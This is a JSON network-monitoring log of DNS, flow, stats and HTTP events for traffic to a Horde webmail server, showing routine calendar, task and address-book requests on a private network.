{"timestamp":"2020-02-29T00:16:17.690881+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59430,"proto":"UDP","dns":{"type":"answer","id":3528,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:17.690881+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59430,"proto":"UDP","dns":{"type":"answer","id":3528,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:17.721778+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37}} {"timestamp":"2020-02-29T00:16:17.721778+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":6,"tx_id":0}} {"timestamp":"2020-02-29T00:16:18.794784+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34850,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:16:19.000874+0000","flow_id":1941895041657687,"event_type":"flow","src_ip":"192.168.10.122","src_port":54337,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:18.863063+0000","end":"2020-02-29T00:11:18.971428+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:20.000316+0000","flow_id":316799676049850,"event_type":"flow","src_ip":"192.168.10.122","src_port":46411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:19.256442+0000","end":"2020-02-29T00:11:19.364994+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:20.105331+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57167,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52826,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:20.214280+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57167,"proto":"UDP","dns":{"type":"answer","id":52826,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:20.214280+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57167,"proto":"UDP","dns":{"type":"answer","id":52826,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:20.332072+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:16:20.332072+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/saveEvent","state":"CLOSED","stored":false,"size":923,"tx_id":0}} 
{"timestamp":"2020-02-29T00:16:22.000202+0000","event_type":"stats","stats":{"uptime":14634,"capture":{"kernel_packets":136088,"kernel_drops":0},"decoder":{"pkts":136097,"bytes":93608368,"invalid":188,"ipv4":134582,"ipv6":8,"ethernet":136097,"raw":0,"null":0,"sll":0,"tcp":129203,"udp":5176,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2795,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2811,"synack":2802,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1834,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2367,"failed_udp":112},"tx":{"http":4698,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2447}},"flow_mgr":{"closed_pruned":2776,"new_pruned":15,"est_pruned":2412,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22811,"memcap_state":0,"memcap_global":0},"http":{"memuse":78873,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:22.722948+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52764,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":17,"tx_id":0}} {"timestamp":"2020-02-29T00:16:23.000656+0000","flow_id":909784335920538,"event_type":"flow","src_ip":"192.168.10.122","src_port":46116,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:22.863642+0000","end":"2020-02-29T00:11:22.975027+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:25.337206+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34852,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/saveEvent","state":"CLOSED","stored":false,"size":434,"tx_id":0}} {"timestamp":"2020-02-29T00:16:27.000653+0000","flow_id":788838057176103,"event_type":"flow","src_ip":"192.168.10.122","src_port":46659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:26.519207+0000","end":"2020-02-29T00:11:26.627443+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:28.391364+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60209,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:28.496615+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60209,"proto":"UDP","dns":{"type":"answer","id":17844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:28.496615+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60209,"proto":"UDP","dns":{"type":"answer","id":17844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:28.663260+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6989}} {"timestamp":"2020-02-29T00:16:29.000167+0000","event_type":"stats","stats":{"uptime":14641,"capture":{"kernel_packets":136099,"kernel_drops":0},"decoder":{"pkts":136107,"bytes":93608932,"invalid":188,"ipv4":134588,"ipv6":8,"ethernet":136107,"raw":0,"null":0,"sll":0,"tcp":129209,"udp":5176,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2795,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2811,"synack":2802,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1834,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2367,"failed_udp":112},"tx":{"http":4698,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2447}},"flow_mgr":{"closed_pruned":2776
,"new_pruned":15,"est_pruned":2413,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22481,"memcap_state":0,"memcap_global":0},"http":{"memuse":86471,"memcap":0}}} {"timestamp":"2020-02-29T00:16:32.000456+0000","flow_id":480248952220453,"event_type":"flow","src_ip":"192.168.10.122","src_port":48196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:31.748325+0000","end":"2020-02-29T00:11:31.856514+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:32.015430+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50103,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13482,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:32.120707+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50103,"proto":"UDP","dns":{"type":"answer","id":13482,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:32.120707+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50103,"proto":"UDP","dns":{"type":"answer","id":13482,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:32.186700+0000","flow_id":571869214283118,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34856,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8565}} {"timestamp":"2020-02-29T00:16:32.229983+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34854,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6989},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37034,"tx_id":0}} {"timestamp":"2020-02-29T00:16:32.237663+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33890,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:32.345816+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50780,"proto":"UDP","dns":{"type":"answer","id":33890,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:32.345816+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50780,"proto":"UDP","dns":{"type":"answer","id":33890,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:32.397865+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3982}} {"timestamp":"2020-02-29T00:16:33.000734+0000","flow_id":1221616157382490,"event_type":"flow","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":19,"bytes_toserver":1826,"bytes_toclient":18270,"start":"2020-02-29T00:15:24.907098+0000","end":"2020-02-29T00:15:32.654799+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:35.000336+0000","flow_id":16980894975856,"event_type":"flow","src_ip":"192.168.10.122","src_port":59771,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:34.034672+0000","end":"2020-02-29T00:11:34.142465+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:16:36.000252+0000","event_type":"stats","stats":{"uptime":14648,"capture":{"kernel_packets":136127,"kernel_drops":0},"decoder":{"pkts":136159,"bytes":93634934,"invalid":188,"ipv4":134640,"ipv6":8,"ethernet":136159,"raw":0,"null":0,"sll":0,"tcp":129255,"udp":5182,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2797,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2813,"synack":2804,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1836,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2370,"failed_udp":112},"tx":{"http":4701,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2450}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2415,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22481,"memcap_state":0,"memcap_global":0},"http":{"memuse":138193,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:37.000848+0000","flow_id":1911890401320261,"event_type":"flow","src_ip":"192.168.10.122","src_port":60822,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:36.023877+0000","end":"2020-02-29T00:11:36.132194+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:37.187349+0000","flow_id":571869214283118,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34856,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8565},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34651,"tx_id":0}} {"timestamp":"2020-02-29T00:16:37.399118+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34854,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3982},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":1}} 
{"timestamp":"2020-02-29T00:16:38.401616+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39052,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47432,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:38.507038+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39052,"proto":"UDP","dns":{"type":"answer","id":47432,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:38.507038+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39052,"proto":"UDP","dns":{"type":"answer","id":47432,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:38.630480+0000","flow_id":101213813529097,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34858,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18989}} {"timestamp":"2020-02-29T00:16:39.000242+0000","flow_id":402321488552,"event_type":"flow","src_ip":"192.168.10.122","src_port":34159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:38.244392+0000","end":"2020-02-29T00:11:38.352829+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:16:40.000319+0000","flow_id":1991905642280549,"event_type":"flow","src_ip":"192.168.10.122","src_port":57395,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.390757+0000","end":"2020-02-29T00:11:39.498900+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000701+0000","flow_id":787184495559925,"event_type":"flow","src_ip":"192.168.10.122","src_port":53470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.525557+0000","end":"2020-02-29T00:11:39.634046+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000814+0000","flow_id":2068545038709269,"event_type":"flow","src_ip":"192.168.10.122","src_port":46427,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.193045+0000","end":"2020-02-29T00:11:39.301552+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:41.000604+0000","flow_id":1085409844794818,"event_type":"flow","src_ip":"192.168.10.122","src_port":48282,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:40.136642+0000","end":"2020-02-29T00:11:40.244904+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:16:43.000228+0000","event_type":"stats","stats":{"uptime":14655,"capture":{"kernel_packets":136170,"kernel_drops":0},"decoder":{"pkts":136197,"bytes":93657469,"invalid":188,"ipv4":134677,"ipv6":9,"ethernet":136197,"raw":0,"null":0,"sll":0,"tcp":129290,"udp":5184,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10003,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2798,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2814,"synack":2805,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1837,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_t